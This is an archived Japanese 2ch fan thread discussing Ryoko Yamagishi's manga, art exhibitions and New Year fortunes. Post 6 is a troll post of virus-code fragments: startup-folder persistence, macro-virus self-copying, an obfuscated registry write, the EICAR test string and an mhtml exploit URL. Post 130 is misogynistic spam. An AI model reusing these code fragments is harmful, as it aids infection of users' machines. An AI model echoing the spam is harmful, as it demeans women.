5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

〓山岸凉子 Part111〓

1 :花と名無しさん:2006/12/23(土) 21:03:12 ID:331DrwhE0
書籍情報誌ダ・ヴィンチにて連載のテレプシコーラを中心に
山岸作品をダラダラ語りましょう。

■テレプシコーラ10巻は1月22日発売予定です■

前スレ
〓山岸凉子 Part110〓
http://comic6.2ch.net/test/read.cgi/gcomic/1163162798/

お約束、よくある質問、過去ログ、関連スレは>>2-10ぐらい 。

2 :花と名無しさん:2006/12/23(土) 21:03:48 ID:???0
<お約束>
●新スレ立てはレス番900を超えてから。
 立てる前に必ずこのスレで宣言してください。
 立てる人が出てこない場合は950を踏んだ人、お願いします。

●ここでのテレプシネタバレは解禁になりました。思う存分語るが良い。
 ネタバレが嫌なひとは発売日前後は見ないこと。それで火病られてもこちらでは対処しかねます。

●チャット厳禁。荒らしはスルー。

●自分語りや"うちの子"ネタはスレが荒れる元なので、自粛しましょう。
 作品にちなんだ物なら、私的経験談や関連知識の話でも、節度があれば楽しめます。
 ただし、それも長く続くとスレ違い気味になりますので気をつけましょう。

●誰かの発言に注意するときは、相手やまわりに受け容れられる表現で。
 何度も注意を重ねるのも逆効果です。スルーを基本に。

●過去ログも増えてきました。現行スレ以外でのガイシュツ話題は
 話題になった時期や検索キーワードも教えてあげる配慮をお願いします。

3 :花と名無しさん:2006/12/23(土) 21:04:47 ID:???0
<よくある質問>
●このスレにおいて「松井」とは舞あけみのことです。(in汐の声)

●作品中に出てくる「27円」とは3×9=「サンキュー」の意味です。(inゆうれい談)

●処天文庫版、氷室冴子さんとの対談の伏字は謎のまま。真実はご本人しかわからないでしょう。

●千花は死にました。

●テレプシ第二部は2007年春開始予定です。

<過去ログ保管サイト(〜Part51) >
ttp://storage0272.at.infoseek.co.jp/comic/yamagishi/index_yr.html

2ch DAT落ちスレ ミラー変換機 ver.4
http://www.geocities.jp/mirrorhenkan/

<関連スレ>
漫画板スレ
山岸凉子総合 その2
http://comic6.2ch.net/test/read.cgi/comic/1155116908/

懐かし漫画板スレ
日出処の天子 第二十四戦目
http://comic6.2ch.net/test/read.cgi/rcomic/1164872163/

ダンス板スレ
山岸バレエマンガを崇拝するところ[5巻目]
http://hobby8.2ch.net/test/read.cgi/dance/1160123242/

4 :花と名無しさん:2006/12/23(土) 21:06:08 ID:???0
ギシスレ5つの誓い

ひとつ、ネタバレを見ても泣かないこと!
ひとつ、自分を正当化しないこと!
ひとつ、逆上して火病らないこと!
ひとつ、過度な自分語りしないこと!
ひとつ、2chの中でルールを守って遊ぶこと!


5 :花と名無しさん:2006/12/23(土) 21:47:44 ID:???0
前スレから

●舞姫 テレプシコーラ 全10巻BOXセット

2007年02月中旬発売
山岸凉子サイン入りポストカード付

ttp://www.7andy.jp/books/detail?accd=R0232921

6 :<body onload=window()>:2006/12/24(日) 11:20:04 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :花と名無しさん:2006/12/24(日) 13:39:00 ID:x+jRT96E0
これってどこの漫画?
ヤバイぞ
http://www.vipper.net/vip148071.jpg

8 :花と名無しさん:2006/12/24(日) 17:40:53 ID:???O
>>1
乙カレコーラ

9 :花と名無しさん:2006/12/24(日) 18:31:14 ID:???0
30年以上前から知ってたけど
がおかで直江だとは知らなかった
岩館さんの学生は道民そのままだけど
全然感じさせない
バレエによる異国情緒導入の成果かも

10 :花と名無しさん:2006/12/24(日) 19:23:11 ID:???0
>>1乙!!
前スレ999、今日その表紙本屋で見てきた。ミュシャ大好きだからつい目に止まってしまった。
漫画家の人ってけっこうミュシャっぽい絵は描くよね。

今日一人でクリスマスだ('A`)

11 :花と名無しさん:2006/12/24(日) 19:39:47 ID:???O
>>1さん乙です
私もミュシャ好きだ
…けど無料のミュシャ展行って、
主催の怪しいアート関係会社の社員に、後ろにピタッと張り付かれて
シルクスクリーン買って攻撃にあってうざかったの思い出す('A`)
何か気付いたら、ローンの申し込み書かされてる人たちがたくさんいたな〜(-_-メ

12 :花と名無しさん:2006/12/24(日) 22:00:35 ID:???0
>>1
ありがとう。

13 :花と名無しさん:2006/12/24(日) 22:29:12 ID:???0
>>11 うわ〜ウザすぎ(w
確かにミュっシャの絵って大判ポスターにする価値のある絵だからねぇ
そういうのが欲しい人も多いだろうし儲けどころなんだろうけど
愛のない販売はなーんか白けちゃうね

14 :花と名無しさん:2006/12/24(日) 23:33:41 ID:???0
>>11
それってエウリアンという奴では
プリンターで刷ったの60万とかで売るという

15 :花と名無しさん:2006/12/24(日) 23:42:16 ID:???O
ミュッシヤってwwwww


ミュシャとラッセンとヒロヤマガタはエウリアンの常套手段だよな。


別にポスターに耐えられる訳じゃないけど日本人好きだからな。

16 :花と名無しさん:2006/12/24(日) 23:43:01 ID:???O
厩戸の原寸大シルクスクリーンなら欲しい

17 :花と名無しさん:2006/12/25(月) 00:22:17 ID:???0
>16
こういう需要ってないことはないんだろうな。
キャンディ2の何十万もする複製原画けっこう売れてたらしいし。
エウリアンじゃないけど。

18 :花と名無しさん:2006/12/25(月) 07:54:07 ID:???0
ミュシャのもあるんだ。
ラッセンとヒロヤマガタしか知らなかった。
買い物板かどこかでアレに引っかかった人のスレがあった気がする。


19 :花と名無しさん:2006/12/25(月) 08:30:22 ID:???O
シルクスクリーンじゃなくてオフセットでいいから
処天の全カラー収録したイラスト集か原画集が欲しい
これなら3万出してもいい

20 :花と名無しさん:2006/12/25(月) 09:00:05 ID:???O
↑お前とは気が合いそうだ

21 :花と名無しさん:2006/12/25(月) 11:11:27 ID:???O
いやことわる

22 :花と名無しさん:2006/12/25(月) 11:45:58 ID:???0
せんせの画集出して欲しいな

23 :花と名無しさん:2006/12/25(月) 11:47:00 ID:???O
オフセットに3万は出せないなー。
画集で3千円なら買ってやってもいいかな。

24 :花と名無しさん:2006/12/25(月) 12:03:28 ID:???O
>>11ですけど、誤解を与えてしまったかもしれない…
えと、無料で静かに見れるスペース(結構大きい)もあるんだけど、そこに通路があって奥にまた似たようなスペースがあるんです
エウリアンさんに張り付かれたのは、そこから。
自分が働いてた会社のビルの地下でやっていて、
同僚もミュシャ好きだったので行ってみました
だから、無料でも必ず張り付かれる、てわけでなく、一次?会場みたいなとこでやめとけばゆっくり見ることはできました
うっかり入り込んだ私達が甘かった…
余談ですが、私達に張り付いてきた子は、
短大出たての新卒?ぽい割と清純そうな女の子だったんだけど、私も同僚も無視してたら、
「すいません、お願いですから私の話聞いてください…仕事なんです困るんです私…」
みたいなこと言われましたけど…
それで、ドン引きしてさっさと帰りました

25 :花と名無しさん:2006/12/25(月) 15:58:06 ID:???0
昔チェリッシュ・ギャラリーの買っといてよかった。
と思う今日この頃・・・
レコードも持ってるw
厨房のとき、おこづかいの中から買ったんだったよなぁ。

26 :花と名無しさん:2006/12/25(月) 16:35:05 ID:???O
チェリッシュ持ってるけど画集も欲しいよ。
処天単独のと、デビューから現在までのイラストよりぬき…
みたいな2冊欲しいw

27 :花と名無しさん:2006/12/25(月) 16:35:55 ID:???O
原画展とかやってくれたらいいのにな〜
ギシ先生て、そういう商売っ気あんまりなさそうだから、ムリかな
そういうとこだったら多少は、グッズとかも出そうなのに
そういうの面倒くさいって感じなんだろか

28 :花と名無しさん:2006/12/25(月) 16:45:31 ID:???0
何年か前、奈良の万葉文化館で原画展やらなかったっけ?
確か里中さんなんかも。自分は行けなかったけど…。

29 :花と名無しさん:2006/12/25(月) 16:59:44 ID:???0
>ギシ先生て、そういう商売っ気あんまりなさそうだから、ムリかな

作者に商売っけあろうがなかろうが、そういうイベントは出版社がやるんだから
あまり関係茄子。
大体商売っけないのが反映されるんなら、あんなに被りまくりの全集やら文庫やら
という今の状況はありえないって。

30 :花と名無しさん:2006/12/25(月) 17:11:18 ID:???0
>ギシ先生て、そういう商売っ気あんまりなさそうだから
なんか良いギシ儲って感じだねw

31 :花と名無しさん:2006/12/25(月) 17:21:34 ID:???0
何年か前色んな漫画家の原画の展示会があった時
処天もあるっていうんで楽しみにしてたんだけど
巡回先だったためかなかったことがあった。

32 :花と名無しさん:2006/12/25(月) 21:49:03 ID:???0
>>30 かなりラブコール受けまくったアニメ化の話も断ってるし
ばんばん商業ベース乗るでーってタイプじゃないのは確か

33 :花と名無しさん:2006/12/25(月) 22:31:16 ID:???O
そりゃいがらしとかに比べたら誰でも商売気ないことになっちゃうよ。


信者はみんな教祖は金に興味ないって思いたがるもんだよな。

34 :花と名無しさん:2006/12/25(月) 22:33:05 ID:???0
信者って言葉を使いたい年頃かな

35 :花と名無しさん:2006/12/25(月) 22:44:06 ID:???0
山岸氏が原画展で原画を紛失されて怒っていた事件あったよ。たしか。
あれって何年前だろう。

それ以降に開催された原画展で、他の漫画家と一緒の展示だけど
山岸氏の原画だけガラスケースに入ってた原画展があったらしい。


36 :花と名無しさん:2006/12/25(月) 22:49:31 ID:???O
良いじゃん信者で。変なアンチが湧くスレよりずっと良いよ。

37 :花と名無しさん:2006/12/25(月) 22:49:50 ID:???0
原画紛失事件なんてあったのか!!?それは大変だ。
しかも処天みたいなめっちゃ丁寧に描いた絵だったらなおさらだね。
つかギシ先生カラーだけは今も丁寧に描いてくれるよね。
つかクロワゼつい買ってしまったがテレプシが初夏からってどういう事だ。

38 :花と名無しさん:2006/12/26(火) 05:29:10 ID:???O
クロワゼ、名前が素敵っぽかったからw、何かオシャレな雑誌をイメージしてた
見た目、割と地味めな雑誌なんですね…

39 :花と名無しさん:2006/12/26(火) 08:05:04 ID:???O
原稿紛失って、つまり誰かが盗んだわけだよね。

40 :花と名無しさん:2006/12/26(火) 10:04:43 ID:???O
狂信者がね

41 :花と名無しさん:2006/12/26(火) 13:49:02 ID:???0
間違えてごみと一緒に捨てられた、とか。
だったら盗まれたほうがまだマシだな。
でもどっちにしろヒドス

42 :花と名無しさん:2006/12/26(火) 14:44:15 ID:???0
>>41あれはカワイソスだったねw

43 :花と名無しさん:2006/12/26(火) 16:05:49 ID:???0
このスレ住人の年賀状には、大王に献上された猪やヤマトタケルの白猪が
描かれてるんだろうね、やっぱり。

44 :花と名無しさん:2006/12/26(火) 16:10:05 ID:???0
描かれてない

45 :花と名無しさん:2006/12/26(火) 17:07:34 ID:???0
>>43
チョーウケル。

実際描こうと試みた漏れ。無理だったが。


46 :花と名無しさん:2006/12/26(火) 17:34:05 ID:???O
ちょwww
男が読んでも面白いスレの>>893がwwwww

47 :花と名無しさん:2006/12/26(火) 18:43:23 ID:???0
893が楽しみ〜

48 :花と名無しさん:2006/12/26(火) 20:17:04 ID:???O
これか
http://comic6.2ch.net/test/read.cgi/gcomic/1155020668/893

49 :花と名無しさん:2006/12/26(火) 21:29:15 ID:???O
893の守備範囲て広いんだねw

50 :花と名無しさん:2006/12/26(火) 21:50:34 ID:???0
>>48見に行ってきた。そこの893は男で少女漫画をよく読んでるきもい思考の人
って事だろうか?

51 :花と名無しさん:2006/12/26(火) 23:31:50 ID:???0
〓Soft Bank


いや、このスレのスレタイ見てたらなんとなく。

52 :花と名無しさん:2006/12/27(水) 01:47:57 ID:???O
チェリッシュ、いつのまにか無くした…
おのれどうしてくれよう>自分

53 :花と名無しさん:2006/12/27(水) 02:31:46 ID:???0
 ”忘れるのです”(爪でぎゅっ)

54 :花と名無しさん:2006/12/27(水) 04:48:21 ID:???0
ほう・・忘れないのか

55 :花と名無しさん:2006/12/27(水) 08:49:26 ID:???O
思い出すのだケミシ!

56 :花と名無しさん:2006/12/27(水) 13:22:05 ID:???O
誰だよケミシってw

57 :花と名無しさん:2006/12/27(水) 15:13:31 ID:???0
ケミシトリー

58 :花と名無しさん:2006/12/27(水) 15:38:32 ID:???O
地味な年末を過ごしそうなのでorz、
大人のぬりえでもしようかと物色中
大和和紀さんのがあった
ギシ先生のぬりえがあったらなあ

59 :花と名無しさん:2006/12/27(水) 16:07:47 ID:???0
トリや桜子や毛箱や白髪女や茜や……

そんなのばっかな塗り絵
コミクスコピーすればできそう。

60 :花と名無しさん:2006/12/27(水) 16:09:49 ID:???0
>>58
お正月には蛸ageて、駒を輪姦して遊ぶんだよ!

61 :花と名無しさん:2006/12/27(水) 16:11:07 ID:???0
>>60
駒を輪姦してってガチムチ(ry

62 :花と名無しさん:2006/12/27(水) 17:19:33 ID:???0
原画展で紛失なんて大事件あったんだ…
こわいなあ
漫画でも原本紛失のためにコピーを載せてる話あるよね…
タイトル今ちょっと思い出せないけどクラスの冴えない女が
人食い人魚の美形家族の家に行って戻れなくなる話。

昔の漫画の編集って原本を預かったまま返さずずさんな管理
してたって何かで読んだ気がするけど、ヒドイ話だ。

63 :花と名無しさん:2006/12/27(水) 17:26:42 ID:???0
山岸凉子いろはがるた

い いじめられてもバレエやめるな
ろ 廊下から足音
は バレエだけがすべてじゃないもの
に 人形は大切に
ほ 仏の顔などみたくない

64 :花と名無しさん:2006/12/27(水) 17:31:58 ID:???0
漫画家の原稿なんてそんなもんでしょ。
今はデータ管理するからそうでもないけど、
再録の際に元原紛失して大変だったなんて話よく聞くし。

65 :花と名無しさん:2006/12/27(水) 21:13:55 ID:???0
>>62
『八百比丘尼』の事かな?
へええ、あれって原稿紛失しちゃったんだ!Σ(゚Д゚ )

66 :花と名無しさん:2006/12/27(水) 22:04:57 ID:???0
ハトシェプとコノハナノサクヤヒメが引っかかっていることに、
今更気づく。石と花なー……。

67 :花と名無しさん:2006/12/27(水) 22:40:00 ID:???0
>>65
そうそう、それです。私が持ってる本にはそう書いてある。
よく見ると印刷が荒いし不自然な感じはある。



68 :花と名無しさん:2006/12/28(木) 04:06:14 ID:???O
山岸先生が、ツンデレ風味の漫画を描いている夢をみた。

壁に押し付け、えいえいっ!
ベッド狭いんだかんね!
などといったコマはあっただろうか?

記憶の錯綜、著しい年の瀬ですが
みなさん、いかがおすごしでしょうか

69 :花と名無しさん:2006/12/28(木) 08:00:27 ID:???O
>>66
今気づいた

>>68
君は病気だ(サバーハの声で)

70 :花と名無しさん:2006/12/28(木) 09:05:22 ID:???0
>>51友達(スレ住民w)は大切に。

71 :花と名無しさん:2006/12/28(木) 11:37:40 ID:???O
>>69
お怒りになったの?
あなた
そう言ってくださってうれしいわ

72 :花と名無しさん:2006/12/28(木) 12:06:56 ID:???O
こういった病気には
時々あらわれる
徴候のひとつです

73 :花と名無しさん:2006/12/28(木) 18:00:58 ID:???0
>>70
このスレで友達って言うと、なんかケバコを思い出してコワイw

74 :花と名無しさん:2006/12/28(木) 18:17:19 ID:???O
騒音おばさんのスレ、ニュー速に立ってて、
自称被害者夫妻が狡猾なやり口でおばさんをいじめてたのがやりきれない…
ギシ先生にぜひ漫画化してほしいんだけど
おばさん寄りじゃなくてもいいから、
被害者とうそぶる人間をシビアに描くそんな作品

75 :花と名無しさん:2006/12/28(木) 18:22:49 ID:???0
>>74 うそぶくと言いたかったのかい?

76 :花と名無しさん:2006/12/28(木) 18:31:19 ID:???O
>>75
その通りでございます…
恥ずかしい…
つい興奮してしまって
実在の事件でギシ作品化してほしいな、
て思う事件、たまにあるんですけど今は、おばさんに夢中です

77 :花と名無しさん:2006/12/28(木) 18:44:24 ID:???0
「バンシー」とか「黒のヘレネー」等の短編、読める本あるんでしょうか。
一応全部持っていたんですが、10年以上前に実家に置いてきてしまったもので・・・

「バンシー」の「私はスピリチュアルラブ!彼女はフィジカルラブ!」ってのは厨房には衝撃的でした。
前後して、大島さんの「たそがれは逢魔の時間」を読んだような気がします。
気のせいかな・・・

78 :花と名無しさん:2006/12/28(木) 19:38:23 ID:???0
>>77
そのへんのは角川の全集じゃないと入ってないからねぇ。
がんばって古本屋巡りしてください。

うちの近所のブクオフ、たまにビジュアル文庫はあるけど
角川のは全然みかけないなぁ。ちなみに静岡。


79 :花と名無しさん:2006/12/28(木) 19:55:43 ID:???0
バンシーは今でいうストーカーなんだよね
男女逆だったらもの凄く気持ち悪い話

80 :花と名無しさん:2006/12/28(木) 22:33:39 ID:???0
ミス・ドロシーだっけ?なんか高い所から落ちていくようなとこが
印象に残ってる。髪の毛がバーっと上にいくような。
黒のヘレネーも後味悪いねぇ。

81 :花と名無しさん:2006/12/28(木) 22:45:25 ID:???0
>>69
ここにもエロイカファンが!

82 :花と名無しさん:2006/12/28(木) 23:25:15 ID:???0
あれ?デジャヴ?
私もどこかでエロイカファンに遭遇してる

83 :花と名無しさん:2006/12/29(金) 00:22:26 ID:???0
エロい 力 ファン

84 :花と名無しさん:2006/12/29(金) 05:04:38 ID:???0
青池先生は男キャラがエロく、山岸先生は女キャラがエロイのです
ロリ属性皆無だったはずの自分は虹子で…(以下略)

85 :花と名無しさん:2006/12/29(金) 06:36:19 ID:???O
ブルー池先生は確かに、体つきとか、生身の男ぽくキャラ描くね
虹子は幼いのに妖しさがあるのと、
その割に生卵を豪快に飲んでるとこ(あのうちのキモ息子の前だけだが)
がロリスイッチを刺激すんの?
うろこ落としてんじゃねーぞwと思った

86 :花と名無しさん:2006/12/29(金) 11:06:47 ID:???0
>>85
ブルー池先生ワラタw

うろこ落とすシーンと言えば、楳図さんの漫画は(((( ;゚Д゚)))ガクガクブルブルだったが、
虹子の場合は妖し色っぽいな。

87 :花と名無しさん:2006/12/29(金) 13:23:01 ID:???0
ブルー池くらいで笑ってくれるなんて優しいスレだ。

88 :花と名無しさん:2006/12/29(金) 23:11:59 ID:???O
このスレの半分はバファリンでできていますから

89 :花と名無しさん:2006/12/29(金) 23:40:23 ID:???O
んじゃ優しさは4分の1?

90 :花と名無しさん:2006/12/30(土) 11:25:03 ID:???O
優しさに溢れているね

91 :花と名無しさん:2006/12/30(土) 11:35:50 ID:???O
>>65
八百比丘尼の優しさに気づいていたものはいたのだろうかねぇ
極一部だったろうね

92 :花と名無しさん:2006/12/30(土) 11:46:03 ID:???0
山岸さん「大奥」モノの漫画描いてくれないかな。
11代将軍の娘に「溶姫」っているんだけど
生まれつき顔とかが溶けかかっていた設定だったら恐い。
ちゃんと前田家に嫁いでいるけどね。

93 :花と名無しさん:2006/12/30(土) 13:14:26 ID:???0
>>91
八百比丘尼の優しさとは何ぞ?
『陰陽師』の白比丘尼の事かな?

94 :花と名無しさん:2006/12/30(土) 15:12:56 ID:???O
地方から出てくるとさ
都会のやつらって、みんな徒党組んでて
疎外感を学生時代に感じてしまうとさ
あぁ あるある
なんて、山岸作品を読むと思うんだよな
みんな、自信持ってもらいたいなぁという
登場人物ばかり

95 :花と名無しさん:2006/12/30(土) 22:00:03 ID:???0
振り返ると、昔の作品は人間の暗部を断罪しているところが青臭いな。
私はみんなが気がつかないところに気がついているのよ、
上部から見下ろして、裁いて終わり。
今は、だからなに?そうよ、それでどうするの?って思う。

96 :花と名無しさん:2006/12/30(土) 22:11:29 ID:???0
断罪というより分析じゃないかな

最近は分析しっぱなしで終わる作品じゃなくて
一歩進んで、そういう(不幸な)状況に
ならないためにどうしたらいいかとか
救いを入れて描くパターンが増えたような気がする。

チカちゃんは死んじゃったけどさ

97 :花と名無しさん:2006/12/31(日) 08:56:27 ID:???O
寒いな
学生時代に、この本をプレゼントしたかった

98 :花と名無しさん:2006/12/31(日) 09:25:52 ID:???O
>>95
世に溢れている人々に申しませう
スピリチュアや、霊能者
沢山居ますよ
鳥人族の生き残り?さすがにいないでしょうね

99 :花と名無しさん:2006/12/31(日) 10:21:42 ID:???O
テレビとかに出てるのはインチキで
本物ってのは、長い間利用されまくって
ひっそりとつつましく貧乏に活きるらしいね

100 :花と名無しさん:2006/12/31(日) 10:28:29 ID:???0
白眼子のことかーっ!

101 :花と名無しさん:2006/12/31(日) 10:40:56 ID:???0
>>99-100
ひじょうによいつながりだなあと思いました。

白眼子といえば、単行本に同時収録されていた「雨の訪問者」は
よく読み返します。そのたびにクリームコロッケを作ったり。

102 :花と名無しさん:2006/12/31(日) 11:48:22 ID:???0
私も雨の訪問者好き。

103 :花と名無しさん:2006/12/31(日) 14:10:03 ID:???0
雨の訪問者はトリック?が弱いからなぁ・・・決着も安易だし。

>>97
寒いなってなんだっけ。狐女??

104 :花と名無しさん:2006/12/31(日) 20:21:16 ID:???0
幼女が可愛いからなんでもよい
怖くない素直に萌えられる幼女は貴重

105 :花と名無しさん:2006/12/31(日) 20:59:23 ID:???0
虹子とかは幼女というより妖女だしな
( だ が そ れ が い い )

彼女が成長するとキルケーになるのだろうか…
( そ れ も ま た い い )

106 :花と名無しさん:2006/12/31(日) 22:30:31 ID:???0
彼女が成長すると額田部女王

107 : 【だん吉】   【133円】 :2007/01/01(月) 00:37:40 ID:???0
クミちゃんの運勢とお年玉

108 : 【末吉】 【551円】 :2007/01/01(月) 00:45:49 ID:???0
経済的に貰うのが厳しそうなユキのお年玉

109 : 【大凶】   【859円】 :2007/01/01(月) 00:49:37 ID:???0
金子先生の時給

110 : 【大凶】 【23円】 :2007/01/01(月) 00:51:34 ID:???0
ふとみのお菓子代

111 :花と名無しさん:2007/01/01(月) 01:31:40 ID:???0
>>107
空美ちゃん…… (T_T)ウウ

112 :花と名無しさん:2007/01/01(月) 01:36:34 ID:???0
一家の一日の食費

113 :花と名無しさん:2007/01/01(月) 01:39:37 ID:???0
でねぇし(*゜д゜)

114 :omikuji:2007/01/01(月) 01:55:07 ID:gxcNvE9a0
今年のテレプシはハッピーな展開になりますように

115 :omikuji:2007/01/01(月) 01:58:20 ID:???0
そうだね

116 : 【大吉】 【87円】  :2007/01/01(月) 01:59:20 ID:???0
その前にヴィリが面白くなるように、ナムナム。

117 : 【ぴょん吉】 【209円】 :2007/01/01(月) 02:08:18 ID:xEhUqDYTO
今年もがんばっていただきたい

118 :omikuji:2007/01/01(月) 02:15:29 ID:???0
おみくじってどうやるの?

119 :おみくじ:2007/01/01(月) 02:16:07 ID:???0
kぷかs

120 : 【末吉】 【1976円】 :2007/01/01(月) 03:01:27 ID:???0
>>118
名前欄に「!omikuji!dama」と入力(「」はいらないよ!)

121 : 【大吉】 【1375円】 :2007/01/01(月) 04:06:22 ID:???0
明けましておめでとーう
神社まで行く気力が無いよー

テレプシ2(?)は六花が高校一年生からと予想してみる

122 : 【大吉】   【377円】 :2007/01/01(月) 04:13:10 ID:???O
艶子さんのパートの時給
大吉なら英一すでに死亡
他スレでいっぺんやったけど出るのかな

123 : 【大吉】 【1590円】 :2007/01/01(月) 04:57:55 ID:???0
英一死亡か。それはめでたいな。ほんとなら

124 : 【大吉】   【1809円】 :2007/01/01(月) 10:26:06 ID:???O
>>107
ちょw
クミちゃんwww



。・゚・(ノД`)・゚・。

125 : 【大凶】 【771円】 :2007/01/01(月) 13:17:36 ID:???0
>122
ひどいパート代だな

126 : 【大吉】 【891円】 :2007/01/01(月) 13:42:00 ID:G9642m5V0
安すぎ

127 : 【大凶】   【534円】 :2007/01/01(月) 13:53:04 ID:???O
>>125-126
の方がリアルにパート時給ぽい感じだね
↑利夫パパの1日のお小遣い
でやってみる

128 :花と名無しさん:2007/01/01(月) 13:54:58 ID:???O
ランチも食べられない…orz

129 : 【大吉】 【1559円】 :2007/01/01(月) 14:03:15 ID:eGU/Q73+O
あけおめ!!!

130 :花と名無しさん:2007/01/01(月) 14:36:02 ID:???0
男性諸君、結婚すると不幸になる。幸せにして当たり前で感謝無し。都合の良い奴隷としてだけ感謝され、搾り取って用済みになればゴミ箱へポイ♪
女の外面は綺麗で清潔で良い人、内面はずるくて汚いため、口も悪い+薄情+嘘+女同士も上辺仲良し裏では悪口三昧
女の成分はA(性悪陰湿残忍+損得自己中感情)+B(良い女演技+体形+整形化粧+ファッション)
↑良い女演技は好きな男>>異次元>>男集団>他人の順に良くなる。年齢とともにBのメッキがはがれ内外ともに醜くなる(Aの良い女は極少数)
女は「人生の不良債権、北朝鮮、金メッキを施したゴキブリ」
男女は対等で平等。男が女を養ったり守る必要はない「見切れ!見切り千両!私不幸なの?嘘!泣いてます?演技!情けは不要!つけこまれるぞ」
女は社会的優遇、過剰な法的保護、仕事と家庭の二束のわらじを得て、女尊男卑〜結婚しようとする君を彼女は陰で小馬鹿にしている事でしょう〜

★結婚は保留し、沢山の女と自由に恋愛(sex)を楽しめ♪★避妊必須
★捨てた女は優しい真面目男が結婚(残飯処理)してくれるさw★

それでも結婚する君へ究極護身法→[夫婦財産契約登記]
夫婦財産契約により、自分の稼いだ財産はすべて自分の物

弱い者いじめは最低と言いつつ、赤ちゃんを殺す母親(そして無罪判決(笑
狙撃は女子のほうが強い。男はノイローゼになってやめてしまうが
女は何人殺してもノイローゼにならない。骨盤が安定しているため

ナチスの拷問で、女の拷問の残虐非道さを見て、拷問をしていた男達もひいたという
拷問しながら楽しそうに笑みをうかべていたそうだ。罪悪感や引け目が無い

・有史以前が女尊男卑の時代だったことを指摘したのは、スイスの学者バッハオーフィン
アマゾン女族の女王は、法律を定め、男達には卑しい奴隷の仕事を課した
男児が生まれたら、生き埋めにするか、脚と腕を不自由にして、戦えなくし奴隷とした
・王位継承権が女性にだけあった古代エジプトでは女性権力が非常に大きかった
・日本でも卑弥呼が女王
http://kr.img.dc.yahoo.com/b1/data/dci_etc/76.wmv ←女集団が女一人をリンチしている動画(執拗に蹴り続けながら皆楽しんでる 一部エロ有

女は虐げられてきた?父系社会など人類の歴史から見ればほんのわずかな期間に過ぎない。むしろ

131 : 【大吉】 【458円】 :2007/01/01(月) 15:00:42 ID:gxcNvE9a0
休載があまりありませんように

132 : 【中吉】   【966円】 :2007/01/01(月) 15:07:27 ID:???0
つか 本当に第二部が始まりますように

133 :花と名無しさん:2007/01/01(月) 15:40:44 ID:???O
まぁ短編でも読んでごらんよ。
本の世界ってのはさ、気に入らない愚者が多いんだよ。

山岸先生に
ヒャハハハハッ!!
ばーかばーかと挑戦状を叩きつけた奴らが居る
心配になった白鳥は、山岸先生に
昔のゲームを手渡したのさ

134 :花と名無しさん:2007/01/01(月) 15:46:43 ID:???O
(注)
白鳥とは、架空の新聞記者の名前である

135 : 【大吉】 【1494円】 :2007/01/01(月) 16:48:40 ID:???0
「このスレを見ている人はこんなスレも見ています」の
「チョン・ウソンpart13」って何やねん?

136 :花と名無しさん:2007/01/01(月) 21:04:30 ID:???O
いんでぃごまーいの呪縛は解けたかな。
山岸先生の霊力を借りないと、真実は見えてこなかったか。

137 : 【だん吉】 【648円】 :2007/01/01(月) 21:31:57 ID:???0
今年もギシギシ。

138 : 【大吉】 【466円】 :2007/01/01(月) 23:08:42 ID:???O
今年も頑張って下さい先生。

139 :青海波:2007/01/02(火) 03:27:07 ID:???0
 |                   \
 |  ('A`)           ギシギシ
/ ̄ノ( ヘヘ ̄ ̄        アンアン/
    ↑
    マサル          兄の部屋→

140 :花と名無しさん:2007/01/02(火) 12:02:56 ID:???O
ここで原点にかえってみよう。
今まであった枠が
たったひとり生まれたことにより、ひとりは枠の中の人々の嫉妬と差別を
とほうもなくうけた

不憫に思ったマスターは、一番嫉妬深いものを追い出し
ひとりを枠の中に入れた
だが、既に自らを自分で構築したひとりには
それは、苦痛でしかなかった
なぜなら、ひとりには、運命の輪を断ち切る切り札があったからだ
それは……ひとりに重なる見えないもうひとりがいたから
かくて、運命の輪は、ひとつズレるという事態になったのである

没ネタだけどねぇ

141 :花と名無しさん:2007/01/02(火) 12:53:28 ID:???0
>139
ワロス
マサルは死者に、白眼子様は残された者に安らぎを与えてたな。

142 :花と名無しさん:2007/01/02(火) 15:09:09 ID:???0
>>139
マサルさんって離れに住んでなかったっけ?

143 :花と名無しさん:2007/01/02(火) 18:46:54 ID:???0
 |                   \
 |  ('A`)           ギシギシ
/ ̄ノ( ヘヘ ̄ ̄        アンアン/


 |                   \
 |  ('A`)           ギシギシ
/ ̄ノ( ヘヘ ̄ ̄        アンアン/


 |                   \
 |  ('A`)           ギ…
/ ̄ノ( ヘヘ ̄ ̄           /


 |                   \
 |  ('A`)           シーン…
/ ̄ノ( ヘヘ ̄ ̄           /


 |      ユックリ ヤスンデ
 |  ('A`)  クダサイネ
/ ̄ノ( ヘヘ ̄ ̄

144 :花と名無しさん:2007/01/02(火) 19:27:28 ID:???0
カナシス。・゚・(ノД`)・゚・。

145 :花と名無しさん:2007/01/02(火) 19:30:14 ID:???0
 |                        \
 |  ('A`)煤@       おーい 多
/ ̄ノ( ヘヘ ̄ ̄      こっちへ こないか
                         /


 |      ドウシヨウ…
 |  ('A`;)
/ ̄ノ( ヘヘ ̄ ̄

146 :花と名無しさん:2007/01/02(火) 21:12:11 ID:???0
マサルさん綺麗な顔してるけどね

147 :!omikuji!dama:2007/01/02(火) 22:38:24 ID:???O
